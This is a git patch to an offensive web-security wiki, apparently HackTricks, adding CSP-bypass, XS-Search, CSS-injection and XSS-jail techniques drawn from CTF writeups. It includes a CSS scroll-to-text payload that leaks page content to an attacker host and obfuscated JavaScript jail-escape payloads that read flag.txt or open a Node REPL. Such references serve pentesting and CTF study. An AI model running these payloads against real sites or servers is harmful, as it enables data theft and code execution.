From 3633df4e81087816924ae206c758e504a115c047 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Tue, 28 Jun 2022 23:06:59 +0000
Subject: [PATCH] GitBook: [#3296] No subject

---
 .../README.md                                 |  9 ++++-
 pentesting-web/xs-search.md                   | 12 +++++--
 .../xs-search/css-injection/README.md         | 35 +++++++++++++++++++
 .../xss-cross-site-scripting/README.md        | 35 +++++++++++++++++++
 4 files changed, 88 insertions(+), 3 deletions(-)

diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md
index 397728174..52ffeab9e 100644
--- a/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -286,7 +286,14 @@ You can bypass this CSP exfiltrating the data via images (in this occasion the X
 
 From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
 
-You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
+You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute** a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
+
+### PHP response buffer overload
+
+PHP is known for **buffering the response to 4096** bytes by default. Therefore, if PHP is showing warning, by providing **enough data inside warnings**, the **response** will be **sent** **before** the **CSP header**, causing the header to be ignored.\
+Then, the technique consist basically in filling the response buffer with warnings so the CSP header isn't sent.
+
+Idea from [**this writeup**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
 
 ### img-src \*; via XSS (iframe) - Time attack
 
diff --git a/pentesting-web/xs-search.md b/pentesting-web/xs-search.md
index e1b9350cf..6af75126f 100644
--- a/pentesting-web/xs-search.md
+++ b/pentesting-web/xs-search.md
@@ -557,6 +557,9 @@ Web applications can deploy COOP response header to prevent other websites from
 
 If a server-side redirect uses **user input inside the redirection** and **extra data**. It's possible to detect this behaviour because usually **servers** has a **limit request length**. If the **user data** is that **length - 1**, because the **redirect** is using **that data** and **adding** something **extra**, it will trigger an **error detectable via Error Events**.
 
+If you can somehow set cookies to a user, you can also perform this attack by **setting enough cookies** ([**cookie bomb**](hacking-with-cookies/cookie-bomb.md)) so with the **response increased size** of the **correct response** an **error** is triggered. In this case, remember that is you trigger this request from a same site, `<script>`  will automatically send the cookies (so you can check for errors).\
+An example of the **cookie bomb + XS-Search** can be found in the Intended solution of this writeup: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
+
 ### Max Redirects
 
 * **Inclusion Methods**: Fetch API, Frames
@@ -673,7 +676,12 @@ Same technique as the previous one but using `window.open` instead of iframes.
 * **Detectable Difference**: Timing
 * **More info**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
 * **Summary:** Attacker can detect downloads by using iframes. If the iframe is still accessible, the file was downloaded.
-* **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
+* **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722) (from [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
+
+{% hint style="warning" %}
+This is why this technique is interesting: Chrome now has **cache partitioning**, and the cache key of the newly opened page is: `(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx)`, but if I open an ngrok page and use fetch in it, the cache key will be: `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)`, the **cache key is different**, so the cache cannot be shared. You can find more detail here: [Gaining security and privacy by partitioning the cache](https://developer.chrome.com/blog/http-cache-partitioning/)\
+(Comment from [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
+{% endhint %}
 
 If a site `example.com` includes a resource from `*.example.com/resource` then that resource will have the **same caching key** as if the resource was directly **requested through top-level navigation**. That is because the caching key is consisted of top-level _eTLD+1_ and frame _eTLD+1_.
 
@@ -694,7 +702,7 @@ Before accessing the cache is faster than loading a resource, it's possible to t
 * **Inclusion Methods**: Fetch API
 * **Detectable Difference**: Timing
 * **More info**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
-* **Summary:** It's possible to try to load a resource and about before it's loaded. Depending on if an error is triggered, the resource was or wasn't cached.
+* **Summary:** It's possible to try to load a resource and about before it's loaded the loading is interrupted. Depending on if an error is triggered, the resource was or wasn't cached.
 * **Code Example**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
 
 [**`AbortController`**](https://developer.mozilla.org/en-US/docs/Web/API/AbortController) **** could be combined with _**fetch**_ and _**setTimeout**_ to both detect whether the **resource is cached** and to evict a specific resource from the browser cache. A nice feature of this technique is that the probing occurs without caching new content in the process.
diff --git a/pentesting-web/xs-search/css-injection/README.md b/pentesting-web/xs-search/css-injection/README.md
index 66d82f83e..f2ba14adc 100644
--- a/pentesting-web/xs-search/css-injection/README.md
+++ b/pentesting-web/xs-search/css-injection/README.md
@@ -127,6 +127,41 @@ Basically the main idea is to **use a custom font from an endpoint controlled by
 </html>
 ```
 
+### Styling Scroll-to-Text Fragment
+
+When a **URL fragment targets an element**, the [**`:target`**](https://drafts.csswg.org/selectors-4/#the-target-pseudo) pseudo-class **can be used** to select it, but **`::target-text` does not match anything**. It only matches text that is itself targeted by the \[fragment].
+
+Therefore, an attacker could use the **Scroll-to-text** fragment and if **something is found** with that text we can **load a resource** from the attackers server to indicate it:&#x20;
+
+```
+:target::before { content : url(target.png) }
+```
+
+An example of this attack could be:
+
+```
+http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator
+```
+
+Which is sending the code:
+
+```css
+<style>:target::before { content : url(http://attackers-domain/?confirmed_existence_of_Administrator_username) }</style>
+```
+
+with the scroll-to-text fragment: `#:~:text=Administrator`
+
+If the word Administrator is found, the indicated resource will be loaded.
+
+There are three main mitigations:
+
+1. **STTF can match only words or sentences on a web page**, theoretically making it impossible to leak random secrets or tokens (unless we break down the secret in one-letter paragraphs).
+2. It is **restricted to top-level browsing contexts**, so it won’t work in an iframe, making the attack **visible to the victim**.
+3. **User-activation gesture is needed for STTF to work**, so only navigations that are a result of user actions are exploitable, which greatly decreases the possibility to automate the attack without user interaction. However, there are certain conditions that the author of the above blog post discovered that facilitate the automation of the attack. Another, similar case, will be presented in PoC#3.
+   1. There are some **bypasses** for this like **social engineering**, or **forcing common browser extensions to interact**.
+
+For more information check the original report: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
+
 ### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
 
 You can specify **external fonts for specific unicode values** that will only be **gathered if those unicode values are present** in the page. For example:
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index 821a34d16..d36576533 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -778,6 +778,41 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
 
 If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](./#javascript-function) to find how to abuse this behaviour.
 
+### XS Jails
+
+If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:
+
+```javascript
+// eval + unescape + regex
+eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
+eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))
+
+// use of with
+with(console)log(123)
+with(/console.log(1)/)with(this)with(constructor)constructor(source)()
+  // Just replace console.log(1) to the real code, the code we want to run is:
+  //return String(process.mainModule.require('fs').readFileSync('flag.txt'))
+
+with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
+with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
+with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
+
+  //Final solution
+with(
+  /with(String)
+    with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
+      with(mainModule)
+        with(require(k))
+          return(String(readFileSync(n)))
+  /)
+with(this)
+  with(constructor)
+    constructor(source)()
+
+// For more uses of with go to challenge misc/CaaSio PSE in
+// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
+```
+
 ### Obfuscation & Advanced Bypass
 
 * [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)